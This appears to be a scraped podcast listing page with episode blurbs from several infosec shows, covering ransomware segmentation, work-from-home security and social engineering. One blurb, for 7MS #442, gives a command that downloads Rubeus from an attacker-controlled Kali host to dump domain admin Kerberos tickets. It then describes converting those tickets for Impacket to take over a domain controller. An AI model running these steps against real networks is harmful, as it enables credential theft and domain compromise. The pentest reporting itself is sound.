Off The Hook - Oct 21, 2020
56 min
Jason Scott joins the OTH panel this week, hackers "jump scare" gamers, reminiscing about voice mail hacking, dealing with old file formats, C-SPAN host admits to lying about his Twitter account being hacked, voters threatened via email, Yahoo groups shutting down for good.
Brakeing Down Security Podcast
Brakeing Down Security Podcast
Bryan Brake, Amanda Berlin, Brian Boettcher
SPONSORED Podcast: Katey Wood from Illumio on deployment and using WIndows Filtering Platform
**Apologies on the Zoom issues** This is the 2nd of 3 sponsored podcast interviews with Illumio about Their zero trust product. Katey Wood is the Director of Product Marketing at Illumio. https://www.linkedin.com/in/kateywood/ Topic: Conversation on segmentation and ransomware Topic Background: The attack surface and vulnerabilities are on the rise, along with cyber attacks Why? Remote everything - cloud collaboration (including processing PII) is the new normal and that means the attack surface is heightened. This requires appropriate network, cloud, and endpoint security. Double ransom with #data #exfiltration -- more attackers are exfiltrating customer data from businesses and (if ransom is withheld) extorting consumers directly through bitcoin - often in the headlines. Privacy is a chief security concern now more than ever before, as remote everything continues and #cyberattacks and #ransomware attacks skyrocket. For businesses, Covid and the new WFH normal means even more vulnerabilities and greater incentive to pay an even higher ransom to avoid privacy law penalties and class-action litigation. Enter Segmentation. Perimeter security is important, but unfortunately, we all know that alone it’s not enough (i.e. breach, after breach, after high-profile breach). #ZeroTrust the assume breach mentality/default deny are philosophies that take security deeper to protect organizations from a threat moving laterally within their environment. This is helpful because it’s often not the initial point of breach that causes so much damage – it’s the breach spreading to more critical data and assets that’s so destructive. #Network #segmentation is a crucial control to secure critical data and PII, by ring-fencing applications with patient or client data. Implementing Zero Trust security policies limits access to only allowed parties with a legitimate business purpose and stops the attacker from moving freely across the network to the most valuable data. #Illumio helps #healthcare, academic, and other critical industries keep their crown jewels safe through better, more scalable micro-segmentation that decouples Zero Trust from the constraints of the network by implementing it on the workload. Vertical ‘Brakedown’ - Healthcare and Education Businesses in the healthcare and education industry often have large numbers of customers and employees, and handle large volumes of PII, are especially at risk. Both have already been under scrutiny for privacy concerns around PII for years, through regulations like #HIPAA in healthcare and #FERPA in education (and now #CCPA). Now that distance learning is the norm and medical records have gone largely electronic, it’s even easier for attackers to move between systems if there are no network segmentation access policies in place to prevent it. Potential Questions: Customer data cases: ‘Dead data’ With today’s workforce largely remote, tell me what that means from a security standpoint. What challenges are businesses facing to protect important data/PII? What is that data “worth” and what are the consequences of falling victim to a ransomware attack or similar event from a bad actor? Talk to me about the “assume breach mentality.” What does that mean and how can you/why should you use this philosophy in your approach to security? How does segmentation relate to compliance? How do the two go hand in hand? How does segmentation protect organizations against large scale breaches? In terms of cost, is segmentation a sizable investment for SMBs? Is it a worthwhile investment, in terms of dollars saved from ransomware attacks? #Segmentation is often thought of as a big (perhaps cumbersome) project – how do you suggest organizations make it more scalable? How does segmentation protect end users?
43 min
Cyber Work
Cyber Work
Infosec
Privileged access management and work-from-home tips
Today we’re talking cloud security and work-from-home. If you’ve ever checked your work email on your personal phone – I know you have, because we’ve all done it! – or touched up some time-sensitive spreadsheets on the same ipad your kids use to play Animal Crossing, Terence Jackson, Chief Information Security & Privacy Officer of Thycotic, is going to tell you how to tighten up your security protocols to ensure that work-from-home doesn’t become breach-from-home! – Enter code “cyberwork” to get 30 days of free training with Infosec Skills: https://www.infosecinstitute.com/skills/ – View transcripts and additional episodes: https://www.infosecinstitute.com/podcast With more than 17 years of public and private sector IT and security experience, Terence Jackson is responsible for protecting the company’s information assets. In his role, he currently leads a corporate-wide information risk management program. He identifies, evaluates and reports on information security practices, controls and risks in order to comply with regulatory requirements and to align with the risk posture of the enterprise. Prior to joining Thycotic, Terence was the Director of Cybersecurity and Professional Services for TSI, a Virginia based Inc. 5000 company. He has also worked as a Senior Security Consultant for Clango, Inc., a top Identity and Access Management (IAM) consultancy. He was featured in and also was a contributor to the book “Tribe of Hackers.” * About Infosec* Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.
50 min
The Social-Engineer Podcast
The Social-Engineer Podcast
Social-Engineer, LLC
Ep. 135 - Fear of video and snakes with Lisa Forte
In this episode, Chris Hadnagy and Maxie Reynolds are joined by social engineering and insider threats expert: Lisa Forte. Learn how Lisa went from fighting terrorists and real-life sea pirates to being an expert on cybercrime and social engineering. Discover how scammers are taking advantage of global uncertainty and understand how to protect yourself from attack. 00:00 – Introduction to Lisa Forte 02:38 – Lisa's path to a career in social engineering 05:27 – The psychology that terrorists use to recruit teenagers 07:52 – Lisa's experience with fighting cyber crime 08:43 – Why Lisa named her cyber security company “Red Goat” 10:23 – The world pandemic made hospitals and their supply chains vulnerable to attack 14:38 – Keep secure by realizing the value of the information you possess 15:41 - How Cyber Volunteers 19 is helping to save lives by making hospitals secure. (twitter) 21:25 – Ego suspension is a required skill for a good social engineer 25:47 – Find someone who gives you honest feedback 27:28 – How Chris deals with harsh criticism 30:27 – New documentary: “hacker:HUNTER Ha(ck)cine” (Part 1) (Part 2) 34:44 – Lisa's Vlog: “Rebooting” 35:44 – Lisa's and Chris’s experience with exposure therapy. 40:00 – How scammers take advantage of global uncertainty 42:37 – Law enforcement has a big disadvantage when fighting cyber crime 45:42: Lisa’s Contact info: LinkedIn Website Rebooting vlog with Chris Twitter 46:56 – Lisa's Book recommendation Prisoners Of Geography 50:20 – Outro Social-Engineer.com Social-Engineer.org The Human Hacking Conference The Innocent Lives Foundation Human Hacking Book Phishing As A Service® Trainings: Practical Open Source Intelligence For Everyday Social Engineers * 11-12 November 2020 - VIRTUAL Advanced Practical Social Engineering Training * 17-20 November, 2020 - VIRTUAL
53 min
7 Minute Security
7 Minute Security
Brian Johnson
7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: * Great blue team tools alerting our customer to a lot of the stuff we were doing * An EDR that we tried to beat up (but it beat us up instead) * SharpGPOAbuse which we talked about extensively last week * Separation of "everyday" accounts from privileged accounts * Multi-factor authentication bypass! * Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!
1 hr 9 min
Search
Clear search
Close search
Google apps
Main menu